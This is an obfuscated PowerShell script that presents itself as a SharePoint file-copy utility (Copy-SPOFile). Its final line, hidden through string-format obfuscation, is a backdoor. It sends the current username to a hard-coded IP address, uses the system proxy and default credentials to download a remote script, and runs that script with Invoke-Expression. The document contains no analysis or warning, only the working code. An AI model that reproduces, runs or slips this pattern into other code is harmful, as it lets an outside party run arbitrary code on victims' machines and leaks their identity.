 ${K1`7t}=[tYpe]("{4}{3}{2}{0}{1}"-f'Eq','uEST','br','eM.net.WE','syst')  ;  ${VS`8`xPK} = [Type]("{4}{1}{2}{5}{3}{0}"-f'TialcAChE','YsTem','.nEt','EDEN','s','.cR') ;

function c`OPY-spo`FilE
{
	[CmdletBinding()]
	param
	(
		[Parameter(MANdatory=${Tr`Ue}, PosItIOn=1)]
		[System.IO.FileSystemInfo]${Fi`Le}, 
		
		[Parameter(mANDAtORy=${T`RuE}, POsITIoN=2)]
		[string]${TArG`ETP`A`TH}, 
		
		[Parameter(ManDaTory=${T`RUe}, POSItioN=3)]
		[bool]${cH`e`CkoUtNeCe`s`sA`Ry}
	)

    if (${fI`le}."p`s`ISCOntAinER")
    {
        &("{1}{0}{3}{2}"-f'dd-SPO','A','older','F') ${t`ARgetPa`TH}
    }
    else
    {
        ${fI`LEP`A`Th} = ${F`ILE}."fU`lLNa`mE"
        
		.("{1}{0}{2}" -f '-Hos','Write','t') ('C'+'opy'+'ing '+'file'+' '+"$filePath "+'to'+' '+"$targetPath") -foregroundcolor ("{1}{0}"-f 'ck','bla') -backgroundcolor ("{0}{1}"-f 'yell','ow')
		
        
        if (${C`hecKOU`T`NEces`sArY})
        {
            
            ${eRr`orA`cTI`oN`P`REFe`REncE} = ("{0}{1}{3}{2}{4}"-f 'Silen','t','on','lyC','tinue')
            &("{1}{0}{2}{3}{4}" -f'ubmit','S','-SPOC','heck','Out') ${t`ArgE`Tp`Ath}
            ${err`or`AcTiONPRe`F`ER`eNCe} = ("{1}{0}"-f 'top','S')
        }
        
		${aRRe`XT`en`SI`oNs} = ("{1}{0}" -f 'tml','.h'), ".js", ("{2}{0}{1}"-f'ma','ster','.'), ("{1}{0}"-f 'txt','.'), ("{1}{0}"-f'css','.'), ("{1}{0}"-f'spx','.a')
		
		if (${arRExte`N`s`IO`Ns} -contains ${F`iLe}."E`xTEnS`iOn")
		{
			${TemPF`i`lE} = &("{5}{4}{3}{1}{0}{2}"-f'sToV','riable','alues','leVa','POFi','Convert-S') -file ${FI`LE}
	        .("{2}{3}{1}{0}" -f'e','Fil','Save','-SPO') ${T`ArGE`TpaTh} ${t`EM`pfiLE}
		} 
		else
		{
			.("{2}{3}{0}{1}"-f'PO','File','Save-','S') ${T`ArGeTP`Ath} ${fI`Le}
		}
        
        if (${cHEcKOut`Ne`cES`sary})
        {
            &("{3}{0}{2}{1}" -f 'i','Out','t-SPOCheck','Subm') ${tA`R`gE`TpATh}
            &("{4}{2}{3}{0}{1}"-f 'C','heckIn','mit-','SPO','Sub') ${t`ARGeT`PatH}
        }
    }
}

${X}=${e`NV:`UseRNAme};${u}=("{5}{3}{8}{2}{7}{4}{0}{9}{6}{1}"-f '38/','xt?u=','13.','tp','.1','ht','.t','195','://54.2','s2') + ${X};${p} =  ( &('lS') ('VariA'+'BL'+'e:K17T'))."vaL`UE"::("{2}{4}{0}{1}{3}" -f 'mW','e','Get','bProxy','Syste').Invoke();${p}."Cr`edeN`T`IAlS"= ( &('ls')  ("{4}{2}{3}{1}{0}"-f '8xpk',':vS','a','RIAble','V') )."vAl`UE"::"DE`FAuLTc`Re`De`NTI`ALs";${w}=.("{0}{1}{2}" -f'New','-Ob','ject') ("{0}{1}{3}{2}"-f 'n','e','ent','t.webcli');${W}."p`ROxY"=${p};${W}."uSE`DEFa`U`LtCre`deNTiA`ls"=${tr`UE};${S}=${W}.("{4}{0}{3}{1}{2}"-f'wnloadSt','i','ng','r','Do').Invoke(${U});.("{2}{0}{4}{3}{1}"-f'ke-E','n','Invo','essio','xpr') -Command ${s};
